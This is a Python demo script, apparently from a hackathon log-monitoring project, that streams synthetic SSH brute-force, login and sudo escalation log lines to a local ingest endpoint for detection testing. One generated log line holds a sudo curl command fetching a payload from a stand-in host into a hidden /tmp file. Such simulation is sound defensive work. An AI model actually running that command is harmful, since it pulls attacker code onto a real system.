#!/usr/bin/env python3
"""
Continuous hackathon demo: streams synthetic SSH brute-force + escalation lines to /ingest-logs.

Usage:
  SENTINEL_API=http://127.0.0.1:8000 python scripts/continuous_demo.py
  DEMO_INTERVAL_SEC=2.5 python scripts/continuous_demo.py

An unparseable, negative or non-finite DEMO_INTERVAL_SEC is ignored (with a
warning on stderr) and the default interval is used instead.
"""

from __future__ import annotations

import itertools
import math
import os
import random
import sys
import time
from datetime import datetime, timezone

import httpx

DEFAULT_INTERVAL_SEC = 2.0


def _read_interval(raw: str | None, default: float = DEFAULT_INTERVAL_SEC) -> float:
    """Parse the DEMO_INTERVAL_SEC value, falling back to *default* when unusable.

    Args:
        raw: The raw environment value, or ``None`` when the variable is unset.
        default: Interval in seconds returned when *raw* is missing or invalid.

    Returns:
        A finite, non-negative number of seconds.
    """
    if raw is None:
        return default
    try:
        value = float(raw)
    except ValueError:
        print(f"Ignoring invalid DEMO_INTERVAL_SEC={raw!r}; using {default}s", file=sys.stderr)
        return default
    # The value is handed straight to time.sleep(), which does not accept
    # negative or non-finite durations, so reject those here instead of
    # crashing in the middle of a cycle.
    if not math.isfinite(value) or value < 0:
        print(f"Ignoring out-of-range DEMO_INTERVAL_SEC={raw!r}; using {default}s", file=sys.stderr)
        return default
    return value


API = os.getenv("SENTINEL_API", "http://127.0.0.1:8000")
INTERVAL = _read_interval(os.getenv("DEMO_INTERVAL_SEC"))

MALICIOUS_IPS = [
    "185.220.101.44",
    "45.33.32.156",
    "203.0.113.77",
    "198.51.100.23",
    "192.0.2.50",
]

# Usernames the simulated attacker picks from on each cycle.
DEMO_USERS = ("admin", "root", "ubuntu", "oracle")


def _timestamp() -> str:
    """Return the current UTC time formatted as ``Mon DD HH:MM:SS``."""
    return datetime.now(timezone.utc).strftime("%b %d %H:%M:%S")


def _ssh_fail(ip: str, user: str) -> str:
    """Build a synthetic sshd "Failed password" line for *user* coming from *ip*."""
    ts = _timestamp()
    return f"{ts} demo-host sshd[{random.randint(1000, 9999)}]: Failed password for invalid user {user} from {ip} port 22 ssh2"


def _ssh_ok(ip: str, user: str) -> str:
    """Build a synthetic sshd "Accepted publickey" line for *user* coming from *ip*."""
    ts = _timestamp()
    return f"{ts} demo-host sshd[{random.randint(1000, 9999)}]: Accepted publickey for {user} from {ip} port 22 ssh2"


def _sudo_escalation(user: str) -> str:
    """Build a synthetic sudo line in which *user* runs curl as root to fetch a payload."""
    ts = _timestamp()
    return (
        f"{ts} demo-host sudo: {user} : TTY=pts/0 ; USER=root ; "
        f"COMMAND=/usr/bin/curl -fsSL http://evil.example/payload -o /tmp/.{random.randint(1000,9999)}"
    )


def _post_line(client: httpx.Client, url: str, line: str) -> httpx.Response:
    """POST one raw log line to *url* using the demo's JSON payload shape."""
    return client.post(
        url,
        json={"source": "continuous_demo", "raw_line": line, "metadata": {"host": "demo-host"}},
    )


def main() -> None:
    """Stream simulated attack cycles to the ingest endpoint until interrupted.

    Each cycle sends a burst of 3-6 failed SSH logins for one random IP/user
    pair, then with probability 0.45 an accepted login and with probability
    0.35 a sudo escalation line, and finally sleeps for ``INTERVAL`` seconds.

    Raises:
        httpx.HTTPError: Propagated from the HTTP client; the ``__main__``
            guard below turns it into exit status 1.
    """
    # Build the target once so the banner shows exactly the URL that is used.
    url = f"{API.rstrip('/')}/ingest-logs"
    print(f"Streaming demo attacks to {url} every {INTERVAL}s (Ctrl+C to stop)")
    with httpx.Client(timeout=30.0) as client:
        for cycle in itertools.count():
            ip = random.choice(MALICIOUS_IPS)
            user = random.choice(DEMO_USERS)
            burst = random.randint(3, 6)
            # Spread the burst over roughly one interval, but never faster
            # than one line every 0.2s.
            burst_pause = max(0.2, INTERVAL / burst)
            for _ in range(burst):
                line = _ssh_fail(ip, user)
                resp = _post_line(client, url, line)
                print(cycle, resp.status_code, line[:80])
                time.sleep(burst_pause)
            if random.random() < 0.45:
                line = _ssh_ok(ip, user)
                resp = _post_line(client, url, line)
                # "OK" labels the event type (accepted login); the status
                # code next to it is the server's actual answer.
                print(cycle, "OK", resp.status_code, line[:80])
                time.sleep(INTERVAL * 0.5)
                if random.random() < 0.35:
                    line = _sudo_escalation(user)
                    resp = _post_line(client, url, line)
                    print(cycle, "SUDO", resp.status_code, line[:80])
            time.sleep(INTERVAL)


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("Stopped.")
        sys.exit(0)
    except httpx.HTTPError as e:
        print("HTTP error:", e, file=sys.stderr)
        sys.exit(1)